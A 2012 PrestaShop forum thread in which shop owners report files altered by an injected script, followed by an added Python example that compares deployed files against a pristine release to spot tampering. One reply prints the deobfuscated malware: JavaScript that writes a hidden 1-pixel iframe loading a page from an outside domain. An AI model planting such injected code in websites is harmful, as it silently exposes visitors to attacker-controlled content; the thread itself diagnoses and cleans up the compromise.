alexmbra Posted November 16, 2012 (edited)

Hi. I am having this problem with my prestashop site ( http://alexsite.t15....ta151/index.php ). Nothing shows up when I enter on that link. And when I enter on the admin area, the following error message appears:

blockmyaccountfooter (parse error in /modules/blockmyaccountfooter/blockmyaccountfooter.php)
blockmyaccountfooter (class missing in /modules/blockmyaccountfooter/blockmyaccountfooter.php)

And when I try to see all my modules (default ones that come with Prestashop), the site stays loading forever. Well, this is only happening now, after the module that I am selling on the prestashop store became online. But this has nothing to do with my module. And I also reinstalled everything, and it was working for a few days, until today. This is the second time I am having this problem. I am starting to think that some other seller is hacking my site.

EDITED: After looking at my files on the server and looking at the server, I can see that some files were modified today.
Comparing them with the original files, almost all of them have this at the end now:

EDITED: I reinstalled everything, changed my passwords, and I also searched my computer for any virus, malware, spyware, etc., but found nothing. Anyway, for now, the site is working again: http://addons.prestashop.com/pt/slideshows-prestashop-modulo/6393-Animated-Flash-Header-Slideshow.html

Edited November 20, 2012 by alexmbra

phrasespot Posted November 16, 2012

> I am having this problem with my prestashop site...

A sorry attempt at injecting an invisible iframe from bgstaking. com. Done wrong, breaking template. Made more readable:

```javascript
(function () {
    var ybfsg = document.createElement('iframe');
    ybfsg.src = 'http://www. bgstaking. com/_vti_cnf/rel.php';
    ybfsg.style.position = 'absolute';
    ybfsg.style.border = '0';
    ybfsg.style.height = '1px';
    ybfsg.style.width = '1px';
    ybfsg.style.left = '1px';
    ybfsg.style.top = '1px';
    if (!document.getElementById('ybfsg')) {
        document.write('<div id=\'ybfsg\'></div>');
        document.getElementById('ybfsg').appendChild(ybfsg);
    }
})();
```

Get someone competent to examine your server/account if you don't know why there should be an iframe injected to pages and then this topic would be more suitable for security forum.

Timpet Posted November 17, 2012

This has hit many shops tonight, and WordPress sites. Sites in general.

Timpet Posted November 17, 2012

Basically it infects all tpl's and js files, and header.php and index.php, perhaps some more I haven't found yet.

ang3lx Posted November 19, 2012

Me too, does someone have news?

phrasespot Posted November 19, 2012

> me too, someone has news?

What news are you expecting? There is no known PS vulnerability that can explain this. The next most probable explanation is that your server has a vulnerability and has been compromised in some way. Identify what/how of breach (optional) then clean your server.

ang3lx Posted November 20, 2012

I think that wasn't a server vulnerability, but something linked to a tpl/js hack. Server seems clean. No file touched. On this server there are about 40 sites, only one prestashop (version 1.4.6.2, not the latest version) and this is the only one that was compromised.

phrasespot Posted November 21, 2012

Other domains on the same server being fine does not mean anything. If the problem was PrestaShop, we would be seeing a lot more of it here. It can be anything from a weak FTP password to a gruntled principle to some vulnerable software installed on that domain. There is not much anyone can do here to determine what happened. Anything that needs to be done now requires server access. Get someone to check what happened and take preventive action.
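
An added example, not code from any poster in this thread or from PrestaShop: the comparison against original files described in the first post, limited to the file types Timpet lists, separating files that only had content appended from files changed in other ways and files that do not belong to the release. It assumes a pristine copy of the same release is unpacked beside the deployed tree; `classify`, `build_sample` and all sample file contents are constructed for illustration.

```python
import tempfile
from pathlib import Path

# File types the thread reports as modified (assumption: only these are scanned).
SUSPECT_SUFFIXES = {".php", ".tpl", ".js"}


def classify(pristine_root: Path, deployed_root: Path) -> dict:
    """Map each non-identical deployed file to "appended" (original intact, bytes
    added at the end), "modified" (differs otherwise) or "unknown" (not in release)."""
    findings = {}
    for path in sorted(deployed_root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_SUFFIXES:
            continue
        rel = path.relative_to(deployed_root).as_posix()
        original = pristine_root / rel
        if not original.is_file():
            findings[rel] = "unknown"
        elif (got := path.read_bytes()) != (want := original.read_bytes()):
            # A differing file that still starts with the original bytes was appended to.
            findings[rel] = "appended" if got.startswith(want) else "modified"
    return findings


def build_sample(root: Path) -> tuple:
    """Constructed sample trees; file names echo those mentioned in the thread."""
    pristine, deployed = root / "pristine", root / "deployed"
    clean = {
        "index.php": b"<?php\nrequire 'init.php';\n",
        "header.php": b"<?php\n$ok = true;\n",
        "themes/a/footer.tpl": b"<div>footer</div>\n",
        "js/tools.js": b"function t() { return 1; }\n",
    }
    for rel, data in clean.items():
        for base in (pristine, deployed):
            (base / rel).parent.mkdir(parents=True, exist_ok=True)
            (base / rel).write_bytes(data)
    trailer = b"\n/* PLACEHOLDER: appended block */\n"  # stands in for injected code
    for rel in ("index.php", "themes/a/footer.tpl"):
        (deployed / rel).write_bytes(clean[rel] + trailer)
    (deployed / "js/tools.js").write_bytes(b"function t() { return 2; }\n")
    (deployed / "js/extra.php").write_bytes(b"<?php // not in the release\n")
    return pristine, deployed


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, status in classify(*build_sample(Path(tmp))).items():
            print(f"{status:9} {rel}")
```

Files reported as "appended" can be restored from the pristine copy; "modified" and "unknown" files need a manual look before anything is deleted or overwritten.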